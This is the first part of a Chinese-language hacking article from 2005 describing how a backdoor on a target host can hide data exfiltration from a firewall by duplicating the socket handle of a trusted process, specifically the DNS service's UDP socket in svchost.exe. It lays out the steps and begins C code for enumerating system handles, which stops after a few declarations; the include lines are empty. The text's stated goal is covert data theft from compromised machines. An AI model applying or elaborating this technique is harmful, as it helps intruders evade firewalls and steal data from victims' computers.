新的穿透防火墙的数据传输技术(1)

　　使用该技术背景：

    在目标主机安放后门，需要将数据传输出去，同时数据很重要，动作不能太大。其他情况“严重”不推荐使用该技术(后面我会讲到为什么)。

　　针对目前防火墙的一些情况，如果自己的进程开一个端口(甚至是新建套接字)肯定被拦。相反，有一点我们也很清楚：被防火墙验证的进程在传送数据时永远不会被拦。所以，我的思路很简单：将其他进程中允许数据传输的套接字句柄拿为已用。

　　过程如下：

　　1. 找出目标进程

　　2. 找出SOCKET句柄

　　2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用

　　3. 用转换后的SOCKET进行数据传输

　　上面的过程写的很简单，但是实际实现起来还是存在一些问题(后面再做讨论)，而且从上面的实现方法也可以看出一些不爽的地方：在目标进程的SOCKET不能是TCP，因为TCP的句柄已经跟外面建立了连接，所以只能是UDP。针对不同系统不同进程我们很难定位一个稳定的进程SOCKET。

　　看到上面这些，你有点丧气了对不对，哈哈。 再想一想，其实我们有一条真正的通罗马的“黄金大道”。

　　我们知道只要一台计算机连上了网络，那么有一种数据传输是肯定不会被拦截的，那就是DNS。你能想像域名解析数据都被拦了造成的结果吗？ 嘿嘿， 既然这个是永远不会被拦的， 而且它又是UDP传输， 我们就拿他开刀。

　　下面是通过直接控制DNS进程(其实也就是svchost.exe，不过对应用户名是NETWORK SERVICE)进行数据传输的例子。编程中出现了很多问题，比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE)，在句柄值为0x2c时进行getsockname时会停止运行等等。具体解决方法请细看注释部分。

　　CODE:

　　/*++

　　Made By ZwelL

　　[email]zwell@sohu.com[/email]

　　2005.4.12

　　--*/

　　#include

　　#include

　　#include

　　#pragma comment(lib, "ws2_32")

　　#pragma comment(lib, "wtsapi32")

　　#define NT_SUCCESS(status) ((NTSTATUS)(status)>=0)

　　#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

　　typedef LONG NTSTATUS;

　　typedef struct _SYSTEM_HANDLE_INFORMATION

　　{

　　ULONG ProcessId;

　　UCHAR ObjectTypeNumber;

　　UCHAR Flags;

　　USHORT Handle;

　　PVOID Object;

　　ACCESS_MASK GrantedAccess;

　　} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

　　typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

　　ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

　　BOOL LocateNtdllEntry ( void )